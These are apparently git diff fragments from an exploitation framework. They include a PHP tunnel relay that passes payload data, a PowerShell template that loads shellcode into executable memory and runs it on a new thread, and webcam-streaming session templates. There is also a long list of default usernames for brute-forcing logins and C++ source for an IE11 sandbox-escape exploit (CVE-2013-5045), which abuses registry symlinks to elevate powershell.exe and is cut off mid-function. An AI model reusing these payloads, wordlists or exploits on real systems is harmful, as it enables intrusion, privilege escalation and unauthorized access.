if($_SERVER['REQUEST_METHOD'] === 'POST'){
|
||||
//handle data for payload - save in a "down" file or the "init" file
|
||||
$postdata = file_get_contents("php://input");
|
||||
if(array_key_exists('HTTP_X_INIT', $_SERVER)){
|
||||
$f = fopen($tempdir."/init", "w"); //only one init file
|
||||
}else{
|
||||
$prefix = "down_" . bin2hex($_SERVER['HTTP_X_URLFRAG']);
|
||||
$f = fopen(tempnam($tempdir,$prefix), "w");
|
||||
}
|
||||
fwrite($f, $postdata);
|
||||
fclose($f);
|
||||
}else{
|
||||
findSendDelete($tempdir, "up_", false);
|
||||
}
|
||||
}else if($_SERVER['REQUEST_METHOD'] === 'POST'){
|
||||
//get data
|
||||
$postdata = file_get_contents("php://input");
|
||||
//See if we should send anything down
|
||||
if($postdata === 'RECV'){
|
||||
findSendDelete($tempdir, "down_" . bin2hex($url));
|
||||
$fname = $tempdir . "/up_recv_" . bin2hex($url); //Only keep one RECV poll
|
||||
}else{
|
||||
$fname = tempnam($tempdir, "up_"); //actual data gets its own filename
|
||||
}
|
||||
//find free and write new file
|
||||
$f = fopen($fname, "w");
|
||||
fwrite($f, $magic);
|
||||
//Little-endian pack length and data
|
||||
$urlen = strlen($url);
|
||||
fwrite($f, pack('V', $urlen));
|
||||
fwrite($f, $url);
|
||||
$postdatalen = strlen($postdata);
|
||||
fwrite($f, pack('V', $postdatalen));
|
||||
fwrite($f, $postdata);
|
||||
fclose($f);
|
||||
//Initial query will be a GET and have a 12345 in it
|
||||
}else if(strpos($url, "12345") !== FALSE){
|
||||
readfile($tempdir."/init");
|
||||
}
|
|
@ -11,10 +11,10 @@ $%{var_win32_func} = Add-Type -memberDefinition $%{var_syscode} -Name "Win32" -n
|
|||
|
||||
%{shellcode}
|
||||
|
||||
$%{var_rwx} = $%{var_win32_func}::VirtualAlloc(0,0x1000,[Math]::Max($%{var_code}.Length, 0x1000),0x40)
|
||||
$%{var_rwx} = $%{var_win32_func}::VirtualAlloc(0,[Math]::Max($%{var_code}.Length,0x1000),0x3000,0x40)
|
||||
|
||||
for ($%{var_iter}=0;$%{var_iter} -le ($%{var_code}.Length-1);$%{var_iter}++) {
|
||||
$%{var_win32_func}::memset([IntPtr]($%{var_rwx}.ToInt32()+$%{var_iter}), $%{var_code}[$%{var_iter}], 1) | Out-Null
|
||||
$%{var_win32_func}::memset([IntPtr]($%{var_rwx}.ToInt32()+$%{var_iter}), $%{var_code}[$%{var_iter}], 1) | Out-Null
|
||||
}
|
||||
|
||||
$%{var_win32_func}::CreateThread(0,0,$%{var_rwx},0,0,0)
|
||||
|
|
|
@ -10,7 +10,7 @@
|
|||
height: 480px;
|
||||
width: 640px;
|
||||
border-radius: 15px;
|
||||
-moz-border-raidus: 15px;
|
||||
-moz-border-radius: 15px;
|
||||
background-color: black;
|
||||
position: absolute;
|
||||
left: 50;
|
||||
|
@ -26,7 +26,7 @@
|
|||
height: 180px;
|
||||
width: 200px;
|
||||
border-radius: 15px;
|
||||
-moz-border-raidus: 15px;
|
||||
-moz-border-radius: 15px;
|
||||
background-color: #9B9B9B;
|
||||
position: absolute;
|
||||
top: 480;
|
||||
|
@ -66,8 +66,9 @@
|
|||
left: 10;
|
||||
}
|
||||
</style>
|
||||
<script src="=WEBRTCAPIJS="> </script>
|
||||
<script>
|
||||
=WEBRTCAPIJS=
|
||||
|
||||
window.onerror = function(e) {
|
||||
document.getElementById("message").innerHTML = "Error: " + e.toString();
|
||||
}
|
||||
|
|
|
@ -2,6 +2,10 @@
|
|||
<head>
|
||||
<title>Video session</title>
|
||||
<style type="text/css">
|
||||
body {
|
||||
background: #fff;
|
||||
}
|
||||
|
||||
div.dot1 {
|
||||
position: absolute;
|
||||
width: 20px;
|
||||
|
@ -84,8 +88,9 @@
|
|||
}
|
||||
</style>
|
||||
|
||||
<script src="api.js"> </script>
|
||||
<script>
|
||||
=WEBRTCAPIJS=
|
||||
|
||||
var channel = '=CHANNEL=';
|
||||
var websocket = new WebSocket('ws://=SERVER=');
|
||||
|
||||
|
@ -136,10 +141,12 @@
|
|||
};
|
||||
|
||||
window.onload = function() {
|
||||
getUserMedia(function(stream) {
|
||||
peer.addStream(stream);
|
||||
peer.startBroadcasting();
|
||||
});
|
||||
setTimeout(function(){
|
||||
getUserMedia(function(stream) {
|
||||
peer.addStream(stream);
|
||||
peer.startBroadcasting();
|
||||
});
|
||||
}, 500);
|
||||
};
|
||||
|
||||
function getUserMedia(callback) {
|
||||
|
|
File diff suppressed because it is too large
Load Diff
File diff suppressed because it is too large
Load Diff
|
@ -0,0 +1,915 @@
|
|||
admin
|
||||
|
||||
root
|
||||
Administrator
|
||||
sysadm
|
||||
tech
|
||||
operator
|
||||
guest
|
||||
security
|
||||
debug
|
||||
manager
|
||||
service
|
||||
!root
|
||||
user
|
||||
netman
|
||||
super
|
||||
diag
|
||||
Cisco
|
||||
Manager
|
||||
DTA
|
||||
apc
|
||||
User
|
||||
Admin
|
||||
cablecom
|
||||
adm
|
||||
wradmin
|
||||
netscreen
|
||||
sa
|
||||
setup
|
||||
cmaker
|
||||
enable
|
||||
MICRO
|
||||
login
|
||||
write
|
||||
monitor
|
||||
netopia
|
||||
op
|
||||
adminview
|
||||
sysadmin
|
||||
echo
|
||||
craft
|
||||
maint
|
||||
comcast
|
||||
CSG
|
||||
readonly
|
||||
manuf
|
||||
cusadmin
|
||||
smc
|
||||
sweex
|
||||
disttech
|
||||
su
|
||||
poll
|
||||
SYSDBA
|
||||
anonymous
|
||||
support
|
||||
recovery
|
||||
USERID
|
||||
eng
|
||||
administrator
|
||||
NETWORK
|
||||
JDE
|
||||
Guest
|
||||
rwa
|
||||
USER
|
||||
test
|
||||
lp
|
||||
ro
|
||||
MAIL
|
||||
ami
|
||||
hsa
|
||||
system
|
||||
MGR
|
||||
ADMINISTRATOR
|
||||
FIELD
|
||||
PBX
|
||||
HELLO
|
||||
hscroot
|
||||
1502
|
||||
superuser
|
||||
netrangr
|
||||
readwrite
|
||||
piranha
|
||||
wlse
|
||||
l3
|
||||
none
|
||||
naadmin
|
||||
public
|
||||
NETOP
|
||||
MANAGER
|
||||
demo
|
||||
D-Link
|
||||
l2
|
||||
rw
|
||||
cgadmin
|
||||
storwatch
|
||||
vcr
|
||||
OPERATOR
|
||||
MDaemon
|
||||
jagadmin
|
||||
enquiry
|
||||
at4400
|
||||
davox
|
||||
PFCUser
|
||||
aaa
|
||||
topicalt
|
||||
admin2
|
||||
1234
|
||||
nms
|
||||
client
|
||||
sys
|
||||
field
|
||||
deskman
|
||||
SYSADM
|
||||
superadmin
|
||||
pmd
|
||||
GEN2
|
||||
ADMN
|
||||
Factory
|
||||
PRODDTA
|
||||
tellabs
|
||||
spcl
|
||||
dadmin
|
||||
helpdesk
|
||||
dhs3mt
|
||||
install
|
||||
adfexc
|
||||
IntraSwitch
|
||||
manage
|
||||
superman
|
||||
SPOOLMAN
|
||||
ADVMAIL
|
||||
vt100
|
||||
PSEAdmin
|
||||
patrol
|
||||
teacher
|
||||
PCUSER
|
||||
Any
|
||||
RSBCMON
|
||||
cellit
|
||||
inads
|
||||
halt
|
||||
locate
|
||||
TMAR#HWMT8007079
|
||||
rapport
|
||||
xbox
|
||||
device
|
||||
NICONEX
|
||||
acc
|
||||
31994
|
||||
bcim
|
||||
websecadm
|
||||
blue
|
||||
topicnorm
|
||||
supervisor
|
||||
ccrusr
|
||||
266344
|
||||
telecom
|
||||
GEN1
|
||||
SSA
|
||||
HTTP
|
||||
mtch
|
||||
bciim
|
||||
browse
|
||||
hydrasna
|
||||
deskres
|
||||
bbsd-client
|
||||
replicator
|
||||
intel
|
||||
radware
|
||||
intermec
|
||||
mlusr
|
||||
init
|
||||
e250
|
||||
Polycom
|
||||
temp1
|
||||
mac
|
||||
3comcso
|
||||
RMUser1
|
||||
WP
|
||||
NAU
|
||||
rcust
|
||||
mtcl
|
||||
topicres
|
||||
bcnas
|
||||
adminuser
|
||||
Root
|
||||
cac_admin
|
||||
mediator
|
||||
Anonymous
|
||||
kermit
|
||||
volition
|
||||
GlobalAdmin
|
||||
LUCENT01
|
||||
LUCENT02
|
||||
adminstat
|
||||
desknorm
|
||||
IntraStack
|
||||
e500
|
||||
deskalt
|
||||
cust
|
||||
tiara
|
||||
bcms
|
||||
m1122
|
||||
telco
|
||||
xd
|
||||
dhs3pms
|
||||
VNC
|
||||
customer
|
||||
cisco
|
||||
adminstrator
|
||||
ftp_nmc
|
||||
me
|
||||
iclock
|
||||
scmadmin
|
||||
installer
|
||||
webadmin
|
||||
ftp_inst
|
||||
DDIC
|
||||
SYSTEM
|
||||
draytek
|
||||
EARLYWATCH
|
||||
super.super
|
||||
ftp_oper
|
||||
corecess
|
||||
weblogic
|
||||
system/manager
|
||||
End
|
||||
d.e.b.u.g
|
||||
target
|
||||
MD110
|
||||
tiger
|
||||
adminttd
|
||||
wlseuser
|
||||
SAPCPIC
|
||||
ftp_admi
|
||||
default.password
|
||||
7
|
||||
2
|
||||
ADMIN
|
||||
itsadmin
|
||||
PUBSUB
|
||||
CTXSYS
|
||||
ftp
|
||||
bill
|
||||
192.168.1.1
|
||||
setpriv
|
||||
GUEST
|
||||
SAP*
|
||||
t3admin
|
||||
hello
|
||||
CISCO15
|
||||
1.79
|
||||
mso
|
||||
Telecom
|
||||
qsysopr
|
||||
APPS
|
||||
Developer
|
||||
mail
|
||||
qsecofr
|
||||
11111
|
||||
Service
|
||||
netadmin
|
||||
any
|
||||
db2fenc1
|
||||
johnson
|
||||
isp
|
||||
demos
|
||||
QSRV
|
||||
MDSYS
|
||||
vpasp
|
||||
TEST
|
||||
QSECOFR
|
||||
1
|
||||
informix
|
||||
5
|
||||
engmode
|
||||
scout
|
||||
qpgmr
|
||||
ADSL
|
||||
images
|
||||
Gearguy
|
||||
Demo
|
||||
serial#
|
||||
BACKUP
|
||||
stratacom
|
||||
6.x
|
||||
mary
|
||||
COMPANY
|
||||
SYS
|
||||
DSL
|
||||
Jetform
|
||||
eagle
|
||||
ROUTER
|
||||
ods
|
||||
siteadmin
|
||||
Alphanetworks
|
||||
Admin1
|
||||
janta
|
||||
servlet
|
||||
username
|
||||
citel
|
||||
Replicator
|
||||
SYSMAN
|
||||
master
|
||||
SUPERUSER
|
||||
cn=orcladmin
|
||||
30
|
||||
maintainer
|
||||
BRIO_ADMIN
|
||||
internal
|
||||
CQSCHEMAUSER
|
||||
DEV2000_DEMOS
|
||||
FSFTASK1
|
||||
checkfs
|
||||
USER1
|
||||
SQLDBA
|
||||
HELP
|
||||
toor
|
||||
qsrvbas
|
||||
SYSADMIN
|
||||
EZsetup
|
||||
BATCH
|
||||
STRAT_USER
|
||||
primenet
|
||||
OEMREP
|
||||
USER6
|
||||
lynx
|
||||
powerdown
|
||||
$ALOC$
|
||||
password
|
||||
VOL-0215
|
||||
tomcat
|
||||
REP_MANAGER
|
||||
WinCCConnect
|
||||
ALLIN1
|
||||
DIRMAINT
|
||||
eqadmin
|
||||
QSRVBAS
|
||||
AQJAVA
|
||||
LASERWRITER
|
||||
PERFSTAT
|
||||
apcuser
|
||||
MBWATCH
|
||||
system_admin
|
||||
unix
|
||||
OWNER
|
||||
NETPRIV
|
||||
VSEMAINT
|
||||
DEMO
|
||||
SYMPA
|
||||
REP_OWNER
|
||||
DCL
|
||||
FAX
|
||||
ARCHIVIST
|
||||
VTAMUSER
|
||||
VMTAPE
|
||||
basisk
|
||||
NetLinx
|
||||
OutOfBox
|
||||
NETMGR
|
||||
DEFAULT
|
||||
OAS_PUBLIC
|
||||
read
|
||||
AP
|
||||
MTSSYS
|
||||
SYSMAINT
|
||||
AUDIOUSER
|
||||
Joe
|
||||
IDMS
|
||||
$SRV
|
||||
snake
|
||||
ROOT
|
||||
PRINTER
|
||||
shutdown
|
||||
satan
|
||||
RDM470
|
||||
trouble
|
||||
fax
|
||||
OP1
|
||||
admin@example.com
|
||||
HOST
|
||||
ADLDEMO
|
||||
QS_ADM
|
||||
bin
|
||||
OPER
|
||||
oracle
|
||||
jj
|
||||
PO7
|
||||
www
|
||||
joe
|
||||
MAINT
|
||||
CMSBATCH
|
||||
CCC
|
||||
role1
|
||||
DATAMOVE
|
||||
MSHOME
|
||||
ISPVM
|
||||
crowd-openid-server
|
||||
user_editor
|
||||
sedacm
|
||||
db2admin
|
||||
Airaya
|
||||
SYSDUMP1
|
||||
IMEDIA
|
||||
primos_cs
|
||||
USER_TEMPLATE
|
||||
pnadmin
|
||||
lpadmin
|
||||
VTAM
|
||||
TRACESVR
|
||||
POSTMASTER
|
||||
MAILER
|
||||
RSCSV2
|
||||
QS_WS
|
||||
circ
|
||||
nobody
|
||||
Tasman
|
||||
DISCOVERER_ADMIN
|
||||
VMASMON
|
||||
LR-ISDN
|
||||
TURBINE
|
||||
GL
|
||||
PO
|
||||
PRINT
|
||||
MODTEST
|
||||
GATEWAY
|
||||
PRIMARY
|
||||
both
|
||||
haasadm
|
||||
pw
|
||||
games
|
||||
DOCSIS_APP
|
||||
bbs
|
||||
EMP
|
||||
postmaster
|
||||
SITEMINDER
|
||||
vgnadmin
|
||||
RJE
|
||||
gonzo
|
||||
NEWS
|
||||
AQUSER
|
||||
UTLBSTATU
|
||||
netbotz
|
||||
xmi_demo
|
||||
ORACACHE
|
||||
MCUser
|
||||
prash
|
||||
sync
|
||||
PM
|
||||
AP2SVP
|
||||
ibm
|
||||
ULTIMATE
|
||||
SABRE
|
||||
user_pricer
|
||||
SUPERVISOR
|
||||
EVENT
|
||||
PORTAL30_SSO_PS
|
||||
FSFADMIN
|
||||
OO
|
||||
WKSYS
|
||||
OPERATNS
|
||||
UVPIM_
|
||||
OE
|
||||
OCITEST
|
||||
web
|
||||
ESSEX
|
||||
None
|
||||
CTXDEMO
|
||||
user_designer
|
||||
QDBA
|
||||
role
|
||||
LRISDN
|
||||
tele
|
||||
WEBCAL01
|
||||
rsadmin
|
||||
OMWB_EMULATION
|
||||
WINDOWS_PASSTHRU
|
||||
MOREAU
|
||||
fast
|
||||
host
|
||||
ORDPLUGINS
|
||||
SYSWRM
|
||||
savelogs
|
||||
SDOS_ICSAP
|
||||
DSSYS
|
||||
MGWUSER
|
||||
TDOS_ICSAP
|
||||
ssp
|
||||
EJSADMIN
|
||||
INGRES
|
||||
DS
|
||||
estheralastruey
|
||||
VCSRV
|
||||
ssladmin
|
||||
CLARK
|
||||
OEMADM
|
||||
restoreonly
|
||||
quser
|
||||
MILLER
|
||||
trmcnfg
|
||||
REPORT
|
||||
user_author
|
||||
dpn
|
||||
tour
|
||||
mountfsys
|
||||
http
|
||||
PROG
|
||||
openfiler
|
||||
RAID
|
||||
STARTER
|
||||
FAXUSER
|
||||
DSA
|
||||
daemon
|
||||
mountsys
|
||||
backuponly
|
||||
IVPM1
|
||||
USER3
|
||||
OPENSPIRIT
|
||||
prime
|
||||
HPLASER
|
||||
CSPUSER
|
||||
qsvr
|
||||
SYSCKP
|
||||
Sysop
|
||||
user_marketer
|
||||
IMAGEUSER
|
||||
bsxuser
|
||||
MASTER
|
||||
USER9
|
||||
OLAPSYS
|
||||
rje
|
||||
ODM_MTR
|
||||
QS_ES
|
||||
lansweeperuser
|
||||
DEMO3
|
||||
Username
|
||||
GPLD
|
||||
uucp
|
||||
DBSNMP
|
||||
VMARCH
|
||||
SWUSER
|
||||
Operator
|
||||
CHEY_ARCHSVR
|
||||
roo
|
||||
n.a
|
||||
accounting
|
||||
backuprestore
|
||||
dni
|
||||
WEBADM
|
||||
iceman
|
||||
guru
|
||||
anon
|
||||
USER8
|
||||
PORTAL30_SSO_PUBLIC
|
||||
postgres
|
||||
WINSABRE
|
||||
USERP
|
||||
IVPM2
|
||||
PORTAL30_SSO
|
||||
ALLIN1MAIL
|
||||
POST
|
||||
TEMP
|
||||
BATCH1
|
||||
PROMAIL
|
||||
SECDEMO
|
||||
ARAdmin
|
||||
sadmin
|
||||
ORAREGSYS
|
||||
VMASSYS
|
||||
man
|
||||
FROSTY
|
||||
LASER
|
||||
tutor
|
||||
DISKCNT
|
||||
default
|
||||
SYSERR
|
||||
WWW
|
||||
VAX
|
||||
PROCAL
|
||||
FAXWORKS
|
||||
LDAP_Anonymous
|
||||
(any
|
||||
setup/snmp
|
||||
DSGATEWAY
|
||||
AWARD_SW
|
||||
CSMIG
|
||||
umountfsys
|
||||
VMS
|
||||
bpel
|
||||
viewuser
|
||||
TDISK
|
||||
politically
|
||||
user_analyst
|
||||
RSCS
|
||||
COMPIERE
|
||||
OSP22
|
||||
guest1
|
||||
FORSE
|
||||
factory
|
||||
bubba
|
||||
QUSER
|
||||
primeos
|
||||
glftpd
|
||||
RMAN
|
||||
mountfs
|
||||
DIRECT
|
||||
firstsite
|
||||
IPFSERV
|
||||
TSUSER
|
||||
BATCH2
|
||||
snmp
|
||||
WebAdmin
|
||||
IBMUSER
|
||||
SMART
|
||||
voadmin
|
||||
BC4J
|
||||
core
|
||||
OPERVAX
|
||||
Bobo
|
||||
WANGTEK
|
||||
OWA
|
||||
USER2
|
||||
jasperadmin
|
||||
VMBSYSAD
|
||||
PVM
|
||||
ctb_admin
|
||||
|
||||
DEMO4
|
||||
qsrv
|
||||
superdba
|
||||
PORTAL30
|
||||
XPRT
|
||||
Crowd
|
||||
18364
|
||||
ilom-admin
|
||||
rdc123
|
||||
sysopr
|
||||
tasman
|
||||
blank
|
||||
WEBREAD
|
||||
ODM
|
||||
11111111
|
||||
AURORA$ORB$UNAUTHENTICATED
|
||||
ADAMS
|
||||
Craft
|
||||
rfmngr
|
||||
SYSTEST_CLIG
|
||||
user_approver
|
||||
ilom-operator
|
||||
Nice-admin
|
||||
answer
|
||||
NETNONPRIV
|
||||
nuucp
|
||||
CIDS
|
||||
VASTEST
|
||||
redline
|
||||
MBMANAGER
|
||||
webmaster
|
||||
APPLSYS
|
||||
USER4
|
||||
hqadmin
|
||||
UOMNI_
|
||||
VMUTIL
|
||||
uucpadm
|
||||
EXFSYS
|
||||
4Dgifts
|
||||
JMUSER
|
||||
CIS
|
||||
UNITY_
|
||||
HLW
|
||||
pwrchute
|
||||
IDMSSE
|
||||
NSA
|
||||
TELEDEMO
|
||||
recover
|
||||
TRAVEL
|
||||
lexar
|
||||
viewer
|
||||
LIBRARY
|
||||
PO8
|
||||
root@localhost
|
||||
NAMES
|
||||
secofr
|
||||
PDMREMI
|
||||
MGE
|
||||
USER7
|
||||
OWA_PUBLIC
|
||||
questra
|
||||
builtin
|
||||
SFCNTRL
|
||||
boss
|
||||
PLEX
|
||||
OLAPDBA
|
||||
OLAPSVR
|
||||
user_expert
|
||||
Bhosda
|
||||
gropher
|
||||
TAHITI
|
||||
NEWINGRES
|
||||
VM3812
|
||||
VIF_DEVELOPER
|
||||
joeuser
|
||||
IPC
|
||||
HELPDESK
|
||||
wlpisystem
|
||||
TSAFVM
|
||||
prtgadmin
|
||||
UAMIS_
|
||||
theman
|
||||
CISINFO
|
||||
mobile
|
||||
QS_CB
|
||||
CDEMORID
|
||||
DEMO2
|
||||
PORTAL30_PUBLIC
|
||||
MDDEMO_CLERK
|
||||
PHANTOM
|
||||
ODS
|
||||
BLAKE
|
||||
TSDEV
|
||||
PRODBM
|
||||
dos
|
||||
APL2PP
|
||||
god1
|
||||
CICSUSER
|
||||
22222222
|
||||
user_publisher
|
||||
OSE$HTTP$ADMIN
|
||||
def
|
||||
SuperUser
|
||||
QS_CBADM
|
||||
SYSA
|
||||
STUDENT
|
||||
Draytek
|
||||
SMDR
|
||||
EREP
|
||||
VSEMAN
|
||||
fwadmin
|
||||
MTS_USER
|
||||
AQDEMO
|
||||
private
|
||||
IS_$hostname
|
||||
HPSupport
|
||||
ORASSO
|
||||
CVIEW
|
||||
SH
|
||||
XXSESS_MGRYY
|
||||
VMMAP
|
||||
PORTAL30_DEMO
|
||||
Ezsetup
|
||||
QS_CS
|
||||
CMSUSER
|
||||
DEMO1
|
||||
userNotUsed
|
||||
ncadmin
|
||||
TESTPILOT
|
||||
fg_sysadmin
|
||||
UETP
|
||||
QS
|
||||
DBI
|
||||
JWARD
|
||||
APPS_MRC
|
||||
Moe
|
||||
SENTINEL
|
||||
Yak
|
||||
PDP11
|
||||
Flo
|
||||
SLIDE
|
||||
INFO
|
||||
checkfsys
|
||||
PRODCICS
|
||||
MXAGENT
|
||||
VMTLIBR
|
||||
POWERCARTUSER
|
||||
VMBACKUP
|
||||
CPNUC
|
||||
distrib
|
||||
MIGRATE
|
||||
CDEMOUCB
|
||||
OLTSEP
|
||||
sysbin
|
||||
signa
|
||||
autocad
|
||||
WEBDB
|
||||
ncrm
|
||||
SAMPLE
|
||||
HCPARK
|
||||
ALLINONE
|
||||
nm2user
|
||||
SAVSYS
|
||||
IIPS
|
||||
PATROL
|
||||
mailadmin
|
||||
TMSADM
|
||||
ESubscriber
|
||||
software
|
||||
god2
|
||||
FSFTASK2
|
||||
ORDSYS
|
||||
gopher
|
||||
PSFMAINT
|
||||
EAdmin
|
||||
12345
|
||||
DECNET
|
||||
OPERATIONS
|
||||
$system
|
||||
PANAMA
|
||||
LIBRARIAN
|
||||
fal
|
||||
NETSERVER
|
||||
POWERCHUTE
|
||||
USER5
|
||||
GPFD
|
||||
QS_OS
|
||||
REPADMIN
|
||||
0
|
||||
DEMO8
|
||||
DEMO9
|
||||
CDEMO82
|
||||
umountsys
|
||||
USER0
|
||||
CDEMOCOR
|
||||
SYSTEST
|
||||
Rodopi
|
||||
user_checker
|
||||
qserv
|
||||
AQ
|
||||
SAPR3
|
||||
VRR1
|
||||
fastwire
|
||||
admi
|
||||
FINANCE
|
||||
WinCCAdmin
|
||||
ESTOREUSER
|
||||
VIRUSER
|
||||
LINK
|
||||
APPLSYSPUB
|
||||
overseer
|
||||
checksys
|
||||
umountfs
|
||||
DBDCCICS
|
||||
TOAD
|
||||
ntpupdate
|
||||
MDDEMO_MGR
|
||||
billy-bob
|
||||
DECMAIL
|
||||
alien
|
||||
nsroot
|
||||
AdvWebadmin
|
||||
dvstation
|
||||
SERVICECONSUMER1
|
||||
MMO2
|
||||
NOC
|
||||
WWWUSER
|
||||
SAP
|
||||
NEVIEW
|
||||
ODSCOMMON
|
||||
pixadmin
|
||||
ripeop
|
||||
PENG
|
||||
netlink
|
||||
L2LDEMO
|
||||
OUTLN
|
||||
12.x
|
||||
scott
|
||||
dbase
|
||||
fam
|
||||
Oper
|
||||
RMAIL
|
||||
FND
|
||||
PRIV
|
||||
SETUP
|
||||
news
|
||||
VSEIPO
|
||||
ilon
|
||||
PLSQL
|
||||
politcally
|
||||
18140815
|
||||
APPUSER
|
||||
CENTRA
|
||||
LBACSYS
|
||||
PDP8
|
||||
SFCMI
|
||||
lpadm
|
||||
Test
|
||||
bewan
|
||||
DIP
|
||||
mfd
|
||||
MDDEMO
|
||||
SWPRO
|
||||
DES
|
||||
Coco
|
||||
GCS
|
||||
rodopi
|
||||
Scott
|
||||
Admin5
|
||||
ANDY
|
||||
DESQUETOP
|
||||
NETCON
|
||||
JONES
|
||||
author
|
||||
MOESERV
|
||||
PUBSUB1
|
||||
CATALOG
|
||||
SQLUSER
|
||||
RE
|
||||
REPORTS_USER
|
||||
MFG
|
||||
HR
|
||||
VIDEOUSER
|
||||
DBA
|
||||
AUTOLOG1
|
||||
AURORA$JIS$UTILITY$
|
||||
wlcsystem
|
||||
CPRM
|
184
external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/CVE-2013-5045.cpp
vendored
Executable file
184
external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/CVE-2013-5045.cpp
vendored
Executable file
|
@ -0,0 +1,184 @@
|
|||
// This file is part of IE11SandboxEsacapes.
|
||||
|
||||
// IE11SandboxEscapes is free software: you can redistribute it and/or modify
|
||||
// it under the terms of the GNU General Public License as published by
|
||||
// the Free Software Foundation, either version 3 of the License, or
|
||||
// (at your option) any later version.
|
||||
|
||||
// IE11SandboxEscapes is distributed in the hope that it will be useful,
|
||||
// but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
// GNU General Public License for more details.
|
||||
|
||||
// You should have received a copy of the GNU General Public License
|
||||
// along with IE11SandboxEscapes. If not, see <http://www.gnu.org/licenses/>.
|
||||
|
||||
#include "stdafx.h"
|
||||
#include <winternl.h>
|
||||
#include <IEPMapi.h>
|
||||
|
||||
#define MAX_ENV 32767
|
||||
|
||||
#pragma comment(lib, "Iepmapi.lib")
|
||||
|
||||
typedef NTSTATUS (__stdcall *fNtOpenSection)(
|
||||
_Out_ PHANDLE SectionHandle,
|
||||
_In_ ACCESS_MASK DesiredAccess,
|
||||
_In_ POBJECT_ATTRIBUTES ObjectAttributes
|
||||
);
|
||||
|
||||
HANDLE MyCreateProcess(bstr_t exec, bstr_t cmdline)
|
||||
{
|
||||
STARTUPINFO startInfo = { 0 };
|
||||
PROCESS_INFORMATION procInfo = { 0 };
|
||||
|
||||
if (!CreateProcess(exec, cmdline, NULL, NULL, FALSE, 0, NULL, NULL,
|
||||
&startInfo, &procInfo))
|
||||
{
|
||||
DebugPrintf("Error Creating Process: %d", GetLastError());
|
||||
|
||||
return nullptr;
|
||||
}
|
||||
else
|
||||
{
|
||||
CloseHandle(procInfo.hThread);
|
||||
|
||||
return procInfo.hProcess;
|
||||
}
|
||||
}
|
||||
|
||||
bstr_t GetExploitUrl(LPWSTR env)
|
||||
{
|
||||
WCHAR buf[MAX_ENV];
|
||||
|
||||
GetEnvironmentVariable(env, buf, MAX_ENV);
|
||||
|
||||
return buf;
|
||||
}
|
||||
|
||||
void CreateIEProcess()
|
||||
{
|
||||
HANDLE hProcess = MyCreateProcess(GetExecutableFileName(nullptr), L"iexplore.exe " + GetExploitUrl(L"HTML_URL"));
|
||||
|
||||
if (hProcess)
|
||||
{
|
||||
WaitForSingleObject(hProcess, 1000);
|
||||
CloseHandle(hProcess);
|
||||
}
|
||||
}
|
||||
|
||||
void CreateUserKey(LPCWSTR path)
|
||||
{
|
||||
STARTUPINFO startInfo = { 0 };
|
||||
PROCESS_INFORMATION procInfo = { 0 };
|
||||
bstr_t sid = GetUserSid();
|
||||
|
||||
bstr_t linkName = L"\\Registry\\User\\" + sid + L"\\Software\\Microsoft\\Internet Explorer\\LowRegistry\\DontShowMeThisDialogAgain";
|
||||
|
||||
LONG res = RegDeleteKey(HKEY_CURRENT_USER, L"Software\\Microsoft\\Internet Explorer\\LowRegistry\\DontShowMeThisDialogAgain");
|
||||
|
||||
DebugPrintf("Delete: %d", res);
|
||||
|
||||
bstr_t destName = L"\\Registry\\User\\" + sid + path;
|
||||
|
||||
CreateLink(linkName, destName, 0);
|
||||
|
||||
CreateIEProcess();
|
||||
|
||||
DeleteLink(linkName);
|
||||
}
|
||||
|
||||
void DoRegistrySymlink()
|
||||
{
|
||||
STARTUPINFO startInfo = { 0 };
|
||||
PROCESS_INFORMATION procInfo = { 0 };
|
||||
HKEY hKey = nullptr;
|
||||
HANDLE hSection = nullptr;
|
||||
bstr_t sid = GetUserSid();
|
||||
bool success = false;
|
||||
|
||||
try
|
||||
{
|
||||
CreateUserKey(L"\\Software\\Microsoft\\Internet Explorer\\Low Rights");
|
||||
CreateUserKey(L"\\Software\\Microsoft\\Internet Explorer\\Low Rights\\ElevationPolicy");
|
||||
CreateUserKey(L"\\Software\\Microsoft\\Internet Explorer\\Low Rights\\ElevationPolicy\\{C2B9F6A6-6E3C-4954-8A73-69038A049D00}");
|
||||
|
||||
LONG res = RegOpenKeyEx(HKEY_CURRENT_USER, L"Software\\Microsoft\\Internet Explorer\\Low Rights\\ElevationPolicy\\{C2B9F6A6-6E3C-4954-8A73-69038A049D00}",
|
||||
0, KEY_ALL_ACCESS | KEY_WOW64_64KEY, &hKey);
|
||||
|
||||
if (res != 0)
|
||||
{
|
||||
DebugPrintf("Open Class Key Failed %d", res);
|
||||
throw 0;
|
||||
}
|
||||
|
||||
CreateRegistryValueString(hKey, L"AppName", L"powershell.exe");
|
||||
CreateRegistryValueString(hKey, L"AppPath", GetWindowsSystemDirectory() + L"\\WindowsPowerShell\\v1.0");
|
||||
CreateRegistryValueDword(hKey, L"Policy", 3);
|
||||
|
||||
bstr_t name = GetSessionPath() + L"\\BaseNamedObjects\\LRIEElevationPolicy_";
|
||||
|
||||
UNICODE_STRING objName = { 0 };
|
||||
objName.Buffer = name;
|
||||
objName.Length = SysStringByteLen(name);
|
||||
objName.MaximumLength = SysStringByteLen(name);
|
||||
|
||||
OBJECT_ATTRIBUTES objAttr = { 0 };
|
||||
|
||||
InitializeObjectAttributes(&objAttr, &objName, OBJ_CASE_INSENSITIVE, 0, 0);
|
||||
|
||||
fNtOpenSection pfNtOpenSection = (fNtOpenSection)GetProcAddress(GetModuleHandle(L"ntdll"), "NtOpenSection");
|
||||
|
||||
NTSTATUS status = pfNtOpenSection(&hSection, SECTION_MAP_READ | SECTION_MAP_WRITE, &objAttr);
|
||||
|
||||
if (status != 0)
|
||||
{
|
||||
DebugPrintf("Error opening section: %08X\n", status);
|
||||
throw 0;
|
||||
}
|
||||
|
||||
unsigned int* p = (unsigned int*)MapViewOfFile(hSection, FILE_MAP_READ | FILE_MAP_WRITE, 0, 0, sizeof(unsigned int));
|
||||
|
||||
if (p == nullptr)
|
||||
{
|
||||
DebugPrintf("Error mapping section %d\n", GetLastError());
|
||||
throw 0;
|
||||
}
|
||||
|
||||
DebugPrintf("Current Counter: %d\n", *p);
|
||||
|
||||
// Increment
|
||||
*p = *p + 1;
|
||||
|
||||
DebugPrintf("New Counter: %d\n", *p);
|
||||
|
||||
UnmapViewOfFile(p);
|
||||
CloseHandle(hSection);
|
||||
hSection = nullptr;
|
||||
|
||||
